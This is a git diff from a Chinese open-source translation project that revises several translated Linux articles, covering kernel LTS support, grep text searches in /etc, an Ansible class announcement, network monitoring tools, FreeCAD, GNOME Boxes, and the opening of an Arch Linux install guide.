正如 [Linux 基金会][8]的 IT 技术设施安全主管 Konstantin Ryabitsev 在 Google+ 上发文解释说,“尽管外面的各种各样的新闻网站可能已经告知你们,但是[内核版本 4.14 的 LTS 并不计划支持 6 年][9]。只是因为 Greg Kroah-Hartman 正在为 LTS 4.4 版本做这项工作并不表示从现在开始所有的 LTS 内核会维持那么久。”
|
||||
|
||||
所以,简而言之,Linux 4.14 将支持到 2020 年 1月份,而 2016 年 1 月 20 号问世的 Linux 4.4 内核将支持到 2022 年。因此,如果你正在编写一个打算能够长期运行的 Linux 发行版,那你需要基于 [Linux 4.4 版本][10]。
|
||||
|
||||
[Linux LTS 版本][11]包含对旧内核树的后向移植漏洞的修复。不是所有漏洞的修复都被导入进来,只有重要漏洞的修复才用于这些内核中。它们不会非常频繁的发布,特别是对那些旧版本的内核树来说。
|
||||
|
||||
Linux 其它的版本有<ruby>尝鲜版<rt>Prepatch</rt></ruby>或发布候选版(RC)、<ruby>主线版<rt>Mainline</rt></ruby>,<ruby>稳定版<rt>Stable</rt></ruby>和 LTS 版。
|
||||
|
||||
RC 版必须从源代码编译并且通常包含漏洞的修复和新特性。这些都是由 Linux Torvalds 维护和发布的。他也维护主线版本树(这是所有新特性被引入的地方)。新的主线内核每几个月发布一次。当主线版本树发布以便通用时,它被称为“稳定版”。稳定版的内核漏洞修复是从主线版本树后向移植的,并且这些修复是由一个指定的稳定版内核维护者来申请。在下一个主线内核变得可用之前,通常也有一些修复漏洞的内核发布。
|
||||
|
||||
对于最新的 LTS 版本,Linux 4.14,Ryabitsev 说,“Greg 已经担负起了 4.14 版本的维护者责任(过去发生过多次),其他人想成为该版本的维护者也是有可能的,但是你最好不要指望。”
|
||||
|
||||
Kroah-Hartman 对 Ryabitsev 的帖子回复道:“[他说神马。][12]”
|
||||
|
||||
-------------------
|
||||
via: http://www.zdnet.com/article/long-term-linux-support-future-clarified/
|
||||
|
||||
作者:[Steven J. Vaughan-Nichols][a]
|
||||
译者:[liuxinyu123](https://github.com/liuxinyu123)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
|
||||
[1]:http://www.zdnet.com/article/long-term-linux-support-future-clarified/#comments-eb4f0633-955f-4fec-9e56-734c34ee2bf2
|
||||
[2]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/
|
||||
[3]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/
|
||||
[4]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/
|
||||
[5]:http://www.zdnet.com/article/long-term-support-linux-gets-a-longer-lease-on-life/
|
||||
[6]:http://www.zdnet.com/article/the-new-long-term-linux-kernel-linux-4-14-has-arrived/
|
||||
[7]:https://www.android.com/
|
||||
[8]:https://www.linuxfoundation.org/
|
||||
[9]:https://plus.google.com/u/0/+KonstantinRyabitsev/posts/Lq97ZtL8Xw9
|
||||
[10]:http://www.zdnet.com/article/whats-new-and-nifty-in-linux-4-4/
|
||||
[11]:https://www.kernel.org/releases.html
|
||||
[12]:https://plus.google.com/u/0/+gregkroahhartman/posts/ZUcSz3Sn1Hc
|
||||
[13]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
|
||||
[14]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
|
||||
[15]:http://www.zdnet.com/blog/open-source/
|
||||
[16]:http://www.zdnet.com/topic/enterprise-software/
|
||||
|
||||
|
||||
|
||||
|
@ -1,18 +1,14 @@
|
||||
如何在 Linux shell 中找出所有包含指定文本的文件
|
||||
------
|
||||
### 目标
|
||||
===========
|
||||
|
||||
本文提供一些关于如何搜索出指定目录或整个文件系统中那些包含指定单词或字符串的文件。
|
||||
**目标:**本文提供一些关于如何搜索出指定目录或整个文件系统中那些包含指定单词或字符串的文件。
|
||||
|
||||
### 难度
|
||||
**难度:**容易
|
||||
|
||||
容易
|
||||
**约定:**
|
||||
|
||||
### 约定
|
||||
|
||||
* \# - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行也可以使用 sudo 命令
|
||||
|
||||
* \$ - 可以使用普通用户来执行指定命令
|
||||
* `#` - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行也可以使用 `sudo` 命令
|
||||
* `$` - 可以使用普通用户来执行指定命令
|
||||
|
||||
### 案例
|
||||
|
||||
@ -25,12 +21,14 @@
|
||||
/etc/os-release:PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
|
||||
/etc/os-release:VERSION="9 (stretch)"
|
||||
```
|
||||
grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制报错信息。结果现实除了文件名外还有包含请求字符串的行也被一起输出了。
|
||||
|
||||
`grep` 的 `-s` 选项会在发现不存在或者不能读取的文件时隐藏报错信息。结果显示除了文件名之外,还有包含请求字符串的行也被一起输出了。
|
||||
|
||||
#### 递归地搜索包含指定字符串的文件
|
||||
|
||||
上面案例中忽略了所有的子目录。所谓递归搜索就是指同时搜索所有的子目录。
|
||||
下面的命令会在 `/etc/` 及其子目录中搜索包含 `stretch` 字符串的文件:
|
||||
|
||||
下面的命令会在 `/etc/` 及其子目录中搜索包含 `stretch` 字符串的文件:
|
||||
|
||||
```shell
|
||||
# grep -R stretch /etc/*
|
||||
@ -67,7 +65,8 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制
|
||||
```
|
||||
|
||||
#### 搜索所有包含特定单词的文件
|
||||
上面 `grep` 命令的案例中列出的是所有包含字符串 `stretch` 的文件。也就是说包含 `stretches` , `stretched` 等内容的行也会被显示。 使用 grep 的 `-w` 选项会只显示包含特定单词的行:
|
||||
|
||||
上面 `grep` 命令的案例中列出的是所有包含字符串 `stretch` 的文件。也就是说包含 `stretches` , `stretched` 等内容的行也会被显示。 使用 `grep` 的 `-w` 选项会只显示包含特定单词的行:
|
||||
|
||||
```shell
|
||||
# grep -Rw stretch /etc/*
|
||||
@ -84,8 +83,9 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制
|
||||
/etc/os-release:VERSION="9 (stretch)"
|
||||
```
|
||||
|
||||
#### 显示包含特定文本文件的文件名
|
||||
上面的命令都会产生多余的输出。下一个案例则会递归地搜索 `etc` 目录中包含 `stretch` 的文件并只输出文件名:
|
||||
#### 显示包含特定文本的文件名
|
||||
|
||||
上面的命令都会产生多余的输出。下一个案例则会递归地搜索 `etc` 目录中包含 `stretch` 的文件并只输出文件名:
|
||||
|
||||
```shell
|
||||
# grep -Rl stretch /etc/*
|
||||
@ -96,8 +96,10 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制
|
||||
```
|
||||
|
||||
#### 大小写不敏感的搜索
|
||||
默认情况下搜索 hi 大小写敏感的,也就是说当搜索字符串 `stretch` 时只会包含大小写一致内容的文件。
|
||||
通过使用 grep 的 `-i` 选项,grep 命令还会列出所有包含 `Stretch` , `STRETCH` , `StReTcH` 等内容的文件,也就是说进行的是大小写不敏感的搜索。
|
||||
|
||||
默认情况下搜索是大小写敏感的,也就是说当搜索字符串 `stretch` 时只会包含大小写一致内容的文件。
|
||||
|
||||
通过使用 `grep` 的 `-i` 选项,`grep` 命令还会列出所有包含 `Stretch` , `STRETCH` , `StReTcH` 等内容的文件,也就是说进行的是大小写不敏感的搜索。
|
||||
|
||||
```shell
|
||||
# grep -Ril stretch /etc/*
|
||||
@ -108,8 +110,9 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制
|
||||
/etc/os-release
|
||||
```
|
||||
|
||||
#### 搜索是包含/排除指定文件
|
||||
`grep` 命令也可以只在指定文件中进行搜索。比如,我们可以只在配置文件(扩展名为`.conf`)中搜索指定的文本/字符串。 下面这个例子就会在 `/etc` 目录中搜索带字符串 `bash` 且所有扩展名为 `.conf` 的文件:
|
||||
#### 搜索时包含/排除指定文件
|
||||
|
||||
`grep` 命令也可以只在指定文件中进行搜索。比如,我们可以只在配置文件(扩展名为`.conf`)中搜索指定的文本/字符串。 下面这个例子就会在 `/etc` 目录中搜索带字符串 `bash` 且所有扩展名为 `.conf` 的文件:
|
||||
|
||||
```shell
|
||||
# grep -Ril bash /etc/*.conf
|
||||
@ -118,7 +121,7 @@ OR
|
||||
/etc/adduser.conf
|
||||
```
|
||||
|
||||
类似的,也可以使用 `--exclude` 来排除特定的文件:
|
||||
类似的,也可以使用 `--exclude` 来排除特定的文件:
|
||||
|
||||
```shell
|
||||
# grep -Ril --exclude=\*.conf bash /etc/*
|
||||
@ -146,8 +149,10 @@ OR
|
||||
```
|
||||
|
||||
#### 搜索时排除指定目录
|
||||
跟文件一样,grep 也能在搜索时排除指定目录。 使用 `--exclude-dir` 选项就行。
|
||||
下面这个例子会搜索 `/etc` 目录中搜有包含字符串 `stretch` 的文件,但不包括 `/etc/grub.d` 目录下的文件:
|
||||
|
||||
跟文件一样,`grep` 也能在搜索时排除指定目录。 使用 `--exclude-dir` 选项就行。
|
||||
|
||||
下面这个例子会搜索 `/etc` 目录中搜有包含字符串 `stretch` 的文件,但不包括 `/etc/grub.d` 目录下的文件:
|
||||
|
||||
```shell
|
||||
# grep --exclude-dir=/etc/grub.d -Rwl stretch /etc/*
|
||||
@ -157,6 +162,7 @@ OR
|
||||
```
|
||||
|
||||
#### 显示包含搜索字符串的行号
|
||||
|
||||
`-n` 选项还会显示指定字符串所在行的行号:
|
||||
|
||||
```shell
|
||||
@ -165,8 +171,10 @@ OR
|
||||
```
|
||||
|
||||
#### 寻找不包含指定字符串的文件
|
||||
最后这个例子使用 `-v` 来列出所有 *不* 包含指定字符串的文件。
|
||||
例如下面命令会搜索 `/etc` 目录中不包含 `stretch` 的所有文件:
|
||||
|
||||
最后这个例子使用 `-v` 来列出所有**不**包含指定字符串的文件。
|
||||
|
||||
例如下面命令会搜索 `/etc` 目录中不包含 `stretch` 的所有文件:
|
||||
|
||||
```shell
|
||||
# grep -Rlv stretch /etc/*
|
||||
@ -178,7 +186,7 @@ via: https://linuxconfig.org/how-to-find-all-files-with-a-specific-text-using-li
|
||||
|
||||
作者:[Lubos Rendek][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者 ID](https://github.com/校对者 ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -1,6 +1,5 @@
|
||||
### [Fedora 课堂会议: Ansible 101][2]
|
||||
|
||||
### By Sachin S Kamath
|
||||
Fedora 课堂会议:Ansible 101
|
||||
==========
|
||||
|
||||
![](https://fedoramagazine.org/wp-content/uploads/2017/07/fedora-classroom-945x400.jpg)
|
||||
|
||||
@ -13,19 +12,12 @@ Fedora 课堂会议本周继续进行,本周的主题是 Ansible。 会议的
|
||||
本课堂课程涵盖以下主题:
|
||||
|
||||
1. SSH 简介
|
||||
|
||||
2. 了解不同的术语
|
||||
|
||||
3. Ansible 简介
|
||||
|
||||
4. Ansible 安装和设置
|
||||
|
||||
5. 建立无密码连接
|
||||
|
||||
6. Ad-hoc 命令
|
||||
|
||||
7. 管理 inventory
|
||||
|
||||
8. Playbooks 示例
|
||||
|
||||
之后还将有 Ansible 102 的后续会议。该会议将涵盖复杂的 playbooks,playbooks 角色(roles),动态 inventory 文件,流程控制和 Ansible Galaxy 命令行工具。
|
||||
@ -43,7 +35,6 @@ Fedora 课堂会议本周继续进行,本周的主题是 Ansible。 会议的
|
||||
本次会议将在 [BlueJeans][10] 上进行。下面的信息可以帮你加入到会议:
|
||||
|
||||
* 网址: [https://bluejeans.com/3466040121][1]
|
||||
|
||||
* 会议 ID (桌面版): 3466040121
|
||||
|
||||
我们希望您可以参加,学习,并享受这个会议!如果您对会议有任何反馈意见,有什么新的想法或者想要主持一个会议, 可以随时在这篇文章发表评论或者查看[课堂 wiki 页面][11].
|
||||
@ -54,7 +45,7 @@ via: https://fedoramagazine.org/fedora-classroom-session-ansible-101/
|
||||
|
||||
作者:[Sachin S Kamath]
|
||||
译者:[imquanquan](https://github.com/imquanquan)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
129
published/20171203 Best Network Monitoring Tools For Linux.md
Normal file
129
published/20171203 Best Network Monitoring Tools For Linux.md
Normal file
@ -0,0 +1,129 @@
|
||||
十个不错的 Linux 网络监视工具
|
||||
===============================
|
||||
|
||||
![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/best-network-monitoring-tools_orig.jpg)
|
||||
|
||||
保持对我们的网络的管理,防止任何程序过度使用网络、导致整个系统操作变慢,对管理员来说是至关重要的。有几个网络监视工具可以用于不同的操作系统。在这篇文章中,我们将讨论从 Linux 终端中运行的 10 个网络监视工具。它对不使用 GUI 而希望通过 SSH 来保持对网络管理的用户来说是非常理想的。
|
||||
|
||||
### iftop
|
||||
|
||||
[![iftop network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png)][2]
|
||||
|
||||
Linux 用户通常都熟悉 `top` —— 这是一个系统监视工具,它允许我们知道在我们的系统中实时运行的进程,并可以很容易地管理它们。`iftop` 与 `top` 应用程序类似,但它是专门监视网络的,通过它可以知道更多的关于网络的详细情况和使用网络的所有进程。
|
||||
|
||||
我们可以从 [这个链接][3] 获取关于这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### vnstat
|
||||
|
||||
[![vnstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/vnstat.png?1511885309)][4]
|
||||
|
||||
`vnstat` 是一个缺省包含在大多数 Linux 发行版中的网络监视工具。它允许我们对一个用户选择的时间周期内发送和接收的流量进行实时控制。
|
||||
|
||||
我们可以从 [这个链接][5] 获取关于这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### iptraf
|
||||
|
||||
[![iptraf monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif)][6]
|
||||
|
||||
IPTraf 是一个基于控制台的 Linux 实时网络监视程序。它会收集经过这个网络的各种各样的信息作为一个 IP 流量监视器,包括 TCP 标志信息、ICMP 详细情况、TCP / UDP 流量故障、TCP 连接包和字节计数。它也收集接口上全部的 TCP、UDP、…… IP 协议和非 IP 协议 ICMP 的校验和错误、接口活动等等的详细情况。(LCTT 译注:此处原文有误,径改之)
|
||||
|
||||
我们可以从 [这个链接][7] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Monitorix - 系统和网络监视
|
||||
|
||||
[![monitorix system monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png)][8]
|
||||
|
||||
Monitorix 是一个轻量级的免费应用程序,它设计用于去监视尽可能多的 Linux / Unix 服务器的系统和网络资源。它里面添加了一个 HTTP web 服务器,可以定期去收集系统和网络信息,并且在一个图表中显示它们。它跟踪平均系统负载、内存分配、磁盘健康状态、系统服务、网络端口、邮件统计信息(Sendmail、Postfix、Dovecot 等等)、MySQL 统计信息以及其它的更多内容。它设计用于去管理系统的整体性能,以及帮助检测故障、瓶颈、异常活动等等。
|
||||
|
||||
下载及更多 [信息在这里][9]。
|
||||
|
||||
### dstat
|
||||
|
||||
[![dstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png)][10]
|
||||
|
||||
这个监视器相比前面的几个知名度低一些,但是,在一些发行版中已经缺省包含了。
|
||||
|
||||
我们可以从 [这个链接][11] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### bwm-ng
|
||||
|
||||
[![bwm-ng monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png)][12]
|
||||
|
||||
这是最简化的工具之一。它允许你去从连接中交互式取得数据,并且,为了便于其它设备使用,在取得数据的同时,能以某些格式导出它们。
|
||||
|
||||
我们可以从 [这个链接][13] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### ibmonitor
|
||||
|
||||
[![ibmonitor tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg)][14]
|
||||
|
||||
与上面的类似,它显示连接接口上过滤后的网络流量,并且,明确地将接收流量和发送流量区分开。
|
||||
|
||||
我们可以从 [这个链接][15] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Htop - Linux 进程跟踪
|
||||
|
||||
[![htop linux processes monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png)][16]
|
||||
|
||||
Htop 是一个更先进的、交互式的、实时的 Linux 进程跟踪工具。它类似于 Linux 的 top 命令,但是有一些更高级的特性,比如,一个更易于使用的进程管理界面、快捷键、水平和垂直的进程视图等更多特性。Htop 是一个第三方工具,它不包含在 Linux 系统中,你必须使用 **YUM** 或者 **APT-GET** 或者其它的包管理工具去安装它。关于安装它的更多信息,读[这篇文章][17]。
|
||||
|
||||
我们可以从 [这个链接][18] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### arpwatch - 以太网活动监视器
|
||||
|
||||
[![arpwatch ethernet monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png)][19]
|
||||
|
||||
arpwatch 是一个设计用于在 Linux 网络中去管理以太网通讯的地址解析程序。它持续监视以太网通讯并记录一个网络中的 IP 地址和 MAC 地址的变化,该变化同时也会记录一个时间戳。它也有一个功能是当一对 IP 和 MAC 地址被添加或者发生变化时,发送一封邮件给系统管理员。在一个网络中发生 ARP 攻击时,这个功能非常有用。
|
||||
|
||||
我们可以从 [这个链接][20] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Wireshark - 网络监视工具
|
||||
|
||||
[![wireshark network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/how-to-use-wireshark_1.jpg?1512299583)][21]
|
||||
|
||||
[Wireshark][1] 是一个自由的应用程序,它允许你去捕获和查看前往你的系统和从你的系统中返回的信息,它可以去深入到数据包中并查看每个包的内容 —— 以分别满足你的不同需求。它一般用于去研究协议问题和去创建和测试程序的特别情况。这个开源分析器是一个被公认的分析器商业标准,它的流行要归功于其久负盛名。
|
||||
|
||||
最初它被叫做 Ethereal,Wireshark 有轻量化的、易于理解的界面,它能分类显示来自不同的真实系统上的协议信息。
|
||||
|
||||
### 结论
|
||||
|
||||
在这篇文章中,我们看了几个开源的网络监视工具。虽然我们挑选出来的这些工具都是我们认为“最佳的”,但这并不意味着它们都最适合你的需要。例如,现在有很多开源监视工具,比如 OpenNMS、Cacti 和 Zenoss,你需要根据你的具体情况考虑每个工具的优势。
|
||||
|
||||
另外,还有不同的、更适合你的需要的不开源的工具。
|
||||
|
||||
你知道的或者使用的在 Linux 终端中的更多网络监视工具还有哪些?
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://www.linuxandubuntu.com/home/best-network-monitoring-tools-for-linux
|
||||
|
||||
作者:[LinuxAndUbuntu][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://www.linuxandubuntu.com
|
||||
[1]:https://www.wireshark.org/
|
||||
[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png
|
||||
[3]:http://www.ex-parrot.com/pdw/iftop/
|
||||
[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/vnstat.png
|
||||
[5]:http://humdi.net/vnstat/
|
||||
[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif
|
||||
[7]:http://iptraf.seul.org/
|
||||
[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png
|
||||
[9]:http://www.monitorix.org
|
||||
[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png
|
||||
[11]:http://dag.wiee.rs/home-made/dstat/
|
||||
[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png
|
||||
[13]:http://sourceforge.net/projects/bwmng/
|
||||
[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg
|
||||
[15]:http://ibmonitor.sourceforge.net/
|
||||
[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png
|
||||
[17]:http://wesharethis.com/knowledgebase/htop-and-atop/
|
||||
[18]:http://hisham.hm/htop/
|
||||
[19]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png
|
||||
[20]:http://linux.softpedia.com/get/System/Monitoring/arpwatch-NG-7612.shtml
|
||||
[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/how-to-use-wireshark_1_orig.jpg
|
||||
|
||||
|
@ -1,45 +1,34 @@
|
||||
FreeCAD - Linux 下的 3D 建模和设计软件
|
||||
FreeCAD:Linux 下的 3D 建模和设计软件
|
||||
============================================================
|
||||
|
||||
![FreeCAD 3D Modeling Software](https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Modeling-Software.png)
|
||||
|
||||
[FreeCAD][8]是一个基于 OpenCasCade 的跨平台机械工程和产品设计工具。作为参数化 3D 建模工具,它可以与 PLM、CAx、CAE、MCAD 和 CAD 协同工作,并且可以使用大量高级扩展和自定义选项扩展其功能。
|
||||
[FreeCAD][8] 是一个基于 OpenCasCade 的跨平台机械工程和产品设计工具。作为参数化 3D 建模工具,它可以与 PLM、CAx、CAE、MCAD 和 CAD 协同工作,并且可以使用大量高级扩展和自定义选项扩展其功能。
|
||||
|
||||
它有基于 QT 的简约用户界面,具有可切换的面板、布局、工具栏、大量的 Python API 以及符合 Open Inventor 的 3D 场景表示模型(感谢 Coin 3D 库)。
|
||||
它有基于 Qt 的简约用户界面,具有可切换的面板、布局、工具栏、大量的 Python API 以及符合 Open Inventor 的 3D 场景表示模型(感谢 Coin 3D 库)。
|
||||
|
||||
[![FreeCAD 3D Software](https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Software.png)][9]
|
||||
|
||||
FreeCAD 3D 软件
|
||||
*FreeCAD 3D 软件*
|
||||
|
||||
正如在网站上所列出的,FreeCAD 有一些使用案例,即:
|
||||
|
||||
> * 家庭用户/业余爱好者:有一个想要构建,或已经已经构建,或者 3D 打印的项目么?在 FreeCAD 中建模。无需之前的 CAD 经验。我们的社区将帮助你快速掌握它!
|
||||
>
|
||||
> * 家庭用户/业余爱好者:有一个想要构建、或者已经构建、或者想 3D 打印的项目么?在 FreeCAD 中建模吧。无需之前具有 CAD 经验。我们的社区将帮助你快速掌握它!
|
||||
> * 有经验的 CAD 用户:如果你在工作中使用商业 CAD 或 BIM 建模软件,你会在 FreeCAD 的许多工作台中找到类似的工具和工作流程。
|
||||
>
|
||||
> * 程序员:几乎所有的 FreeCAD 功能都可以用 Python 访问。你可以轻松扩展 FreeCAD 的功能,使用脚本将其自动化,创建自己的模块,甚至将 FreeCAD 嵌入到自己的程序中。
|
||||
>
|
||||
> * 教育者:教给你的学生一个免费的软件,不用担心购买许可证。他们可以在家里安装相同的版本,并在离开学校后继续使用它。
|
||||
|
||||
#### FreeCAD 中的功能
|
||||
### FreeCAD 中的功能
|
||||
|
||||
* 免费软件:FreeCAD 免费供所有人下载和使用。
|
||||
|
||||
* 开源:在 [GitHub][4] 上开源。
|
||||
|
||||
* 跨平台:所有的 Windows、Linux 和 Mac 用户都可以享受 FreeCAD 的功能。
|
||||
|
||||
* 全面的[在线文档][5]。
|
||||
|
||||
* 一个给初学者和专业人士的免费[在线手册][6]。
|
||||
|
||||
* 注释支持。例如:文字和尺寸。
|
||||
|
||||
* 内置的 Python 控制台。
|
||||
|
||||
* 完全可定制和脚本化的用户界面。
|
||||
|
||||
* [这里][7]有展示项目的在线社区。
|
||||
|
||||
* 用于建模和设计各种物体的可扩展模块。
|
||||
|
||||
FreeCAD 为用户提供的功能比我们在这里列出的多得多,所以请随时在其网站的[功能页面][11]上查看其余的功能。
|
||||
@ -48,7 +37,7 @@ FreeCAD 为用户提供的功能比我们在这里列出的多得多,所以请
|
||||
|
||||
尝试一下它,看看你会不会喜欢上它。
|
||||
|
||||
[下载 Linux 下的 FreeCAD][13]
|
||||
- [下载 Linux 下的 FreeCAD][13]
|
||||
|
||||
准备成为 FreeCAD 用户了么?你最喜欢哪个功能?你有没有遇到过与它功能相近的其他软件?
|
||||
|
||||
@ -58,9 +47,9 @@ FreeCAD 为用户提供的功能比我们在这里列出的多得多,所以请
|
||||
|
||||
via: https://www.fossmint.com/freecad-3d-modeling-and-design-software-for-linux/
|
||||
|
||||
作者:[Martins D. Okoi ][a]
|
||||
作者:[Martins D. Okoi][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -1,26 +1,25 @@
|
||||
# GNOME Boxes 使得测试 Linux 发行版更加简单
|
||||
GNOME Boxes 使得测试 Linux 发行版更加简单
|
||||
==============
|
||||
|
||||
![GNOME Boxes Distribution Selection](http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/GNOME-Boxes-INstall-Distros-750x475.jpg)
|
||||
|
||||
在 GNOME 桌面上创建 Linux 虚拟机即将变得更加简单。
|
||||
> 在 GNOME 桌面上创建 Linux 虚拟机即将变得更加简单。
|
||||
|
||||
[_GNOME Boxes_][5] 的下一个主要版本能够直接在应用程序内下载流行的 Linux(和基于 BSD 的)操作系统。
|
||||
[GNOME Boxes][5] 的下一个主要版本能够直接在应用程序内下载流行的 Linux(和基于 BSD 的)操作系统。
|
||||
|
||||
Boxes 是免费的开源软件。它可以用来访问远程和虚拟系统,因为它是用 [QEMU][6]、KVM 和 libvirt 虚拟化技术构建的。
|
||||
Boxes 是自由开源软件。它可以用来访问远程和虚拟系统,因为它是用 [QEMU][6]、KVM 和 libvirt 虚拟化技术构建的。
|
||||
|
||||
对于新的 ISO-toting 的集成,_Boxes_ 利用 [libosinfo][7] 这一操作系统的数据库,该数据库还提供了有关任何虚拟化环境要求的详细信息。
|
||||
|
||||
在 GNOME 开发者 Felipe Borges 的[这个(起错标题)视频] [8]中,你可以看到改进的“源选择”页面,包括为给定的发行版下载特定 ISO 架构的能力:
|
||||
在 GNOME 开发者 Felipe Borges 的[这个(起错标题的)视频] [8]中,你可以看到改进的“源选择”页面,包括为给定的发行版下载特定架构的 ISO 的能力:
|
||||
|
||||
[video](https://youtu.be/CGahI05Gbac)
|
||||
|
||||
尽管它是一个核心 GNOME 程序,我不得不承认,我从来没有使用过 Boxes。(我这么做)并不是说我没有听到有关它的好处,只是我更熟悉在 VirtualBox 中设置和配置虚拟机。
|
||||
|
||||
> “我内心的偷懒精神会欣赏这个集成”
|
||||
|
||||
我承认在浏览器中下载一个 ISO 然后将虚拟机指向它(见鬼,这是我们大多数在过去十年来一直做的事)并不是一件很_困难_的事。
|
||||
|
||||
但是我内心的偷懒精神会欣赏这个集成。
|
||||
但是我内心的偷懒精神会欣赏这种集成。
|
||||
|
||||
所以,感谢这个功能,我将在明年 3 月份发布 GNOME 3.28 时,在我的系统上解压 Boxes。我会启动 _Boxes_,闭上眼睛,随意从列表中挑选一个发行版,并立即拓宽我的视野。
|
||||
|
||||
@ -28,9 +27,9 @@ Boxes 是免费的开源软件。它可以用来访问远程和虚拟系统,
|
||||
|
||||
via: http://www.omgubuntu.co.uk/2017/12/gnome-boxes-install-linux-distros-directly
|
||||
|
||||
作者:[ JOEY SNEDDON ][a]
|
||||
作者:[JOEY SNEDDON][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -0,0 +1,300 @@
|
||||
一步步教你如何安装 Arch Linux
|
||||
======
|
||||
|
||||
![How to install Arch Linux][5]
|
||||
|
||||
> 简要说明:这一教程会教你如何用简单步骤安装 Arch Linux。
|
||||
|
||||
[Arch Linux][1] 是一个 x86-64 通用发行版,它流行于那些喜欢 [DIY][2] Linux 系统的用户和 Linux 铁杆粉丝当中。其默认的安装文件只含有一个最基本的系统,它希望使用者自己配置并使用 Arch 系统。其基于 KISS 原则(<ruby>使它保持简单、傻瓜<rt>Keep It Simple, Stupid!</rt></ruby>),Arch Linux 是一个专注于优雅、代码正确,精简而简洁的系统。
|
||||
|
||||
Arch 支持滚动发布模式,并且有自己的软件包管理器 —— [pacman][3]。为了提供一个前沿的操作系统,Arch 绝不会错失任何一个最新的源。实际上,它只提供了一个最小化的基本操作系统,使得你可以在低端硬件上安装 Arch,并且只安装你所必需的软件包。
|
||||
|
||||
同时,它也是最流行的从头开始学习 Linux 的操作系统之一。如果你想以 DIY 精神自己体验一番,你应该尝试一下 Arch Linux。 这被许多 Linux 用户视作核心的 Linux 体验。
|
||||
|
||||
在这篇文章里,我们会了解到如何安装、配置 Arch 并在其上安装桌面环境。
|
||||
|
||||
### 如何安装 Arch Linux
|
